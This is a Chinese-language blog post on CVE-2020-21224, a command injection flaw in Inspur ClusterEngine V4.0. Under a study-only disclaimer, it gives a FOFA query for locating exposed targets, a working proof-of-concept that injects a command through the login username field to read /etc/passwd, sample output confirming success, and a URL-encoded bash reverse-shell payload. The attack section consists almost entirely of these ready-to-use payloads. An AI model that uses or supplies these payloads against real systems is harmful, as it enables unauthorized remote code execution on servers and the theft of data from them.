当前位置:网站首页>浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224
浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224
2022-07-28 21:50:00 【初岄】
浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224
此文章仅供用于学习研究,严禁用于非法用途,否则后果自负。
漏洞简介
浪潮服务器群集管理系统存在危险字符未过滤,导致远程命令执行
漏洞影响
浪潮ClusterEngineV4.0
FOFA语法
title="TSCEV4.0"
漏洞复现
登录页面如下

POC
POC测试(出现 root:x:0:0 则存在漏洞)
op=login&username=test`$(cat /etc/passwd)`
{"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user test does not exist\nerror:1\n"}
反弹shell
op=login&username=test`$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}}%2F{PORT}%200%3E%261)`

边栏推荐
- JS small method
- 可视化全链路日志追踪
- Wechat applet development ④
- 「行泊一体」放量,福瑞泰克高性能域控制器领跑新赛道
- 1314_ Serial port technology_ Basic information of RS232 communication
- Achieve high throughput through Wi Fi 7 - insight into the next generation of Wi Fi physical layer
- CV实例分割模型小抄(1)
- 被忽视的智能电视小程序领域
- What if win11 cannot find the DNS address? Win11 can't find DNS and can't access the web page solution
- 深度剖析集成学习Xgboost(续)
猜你喜欢

Samba service setup

Arduino UNO驱动合宙1.8‘TFT SPI屏幕示例演示(含资料包)

What's special about this wireless router, which is popular in the whole network?
![[self] - brush questions BFS](/img/e9/e90557c63c217a43c6a5d9de0d0869.png)
[self] - brush questions BFS
![[self] - brush questions array](/img/a9/d12c41183df6961b2e9dd7cb49dfec.png)
[self] - brush questions array

What if win11 quick copy and paste cannot be used? Win11 shortcut copy and paste cannot be used

通过Wi-Fi 7实现极高吞吐量——洞察下一代Wi-Fi物理层

LabVIEW对VISA Write和Read函数的异步和同步

Go 中的并发 Concurrency

Optimization and implementation of custom MVC
随机推荐
刨根问底学 二叉树
Typescript类方法this指针绑定
被忽视的智能电视小程序领域
Achieve high throughput through Wi Fi 7 - insight into the next generation of Wi Fi physical layer
深度剖析集成学习GBDT
这款全网热评的无线路由器,到底有什么特别?
苹果官网正在更新维护 Apple Store,国行 iPhone 13 / Pro 等产品将最高优惠 600 元
搭载新一代超安全蜂窝电池,思皓爱跑上市13.99万元起售
深度剖析集成学习Xgboost(续)
CV语义分割模型小抄(2)
[self] - question brushing - peak value
What if win11 cannot find the DNS address? Win11 can't find DNS and can't access the web page solution
Wechat applet development ④
Development of small programs ②
Fundamental inquiry binary tree
CV目标检测模型小抄(2)
程序员成长第三十篇:识别真伪需求的神器
How to automatically install homebrew in China (domestic address)
VR全景创业如何开拓市场?如何让创业之路更加顺畅?
Object object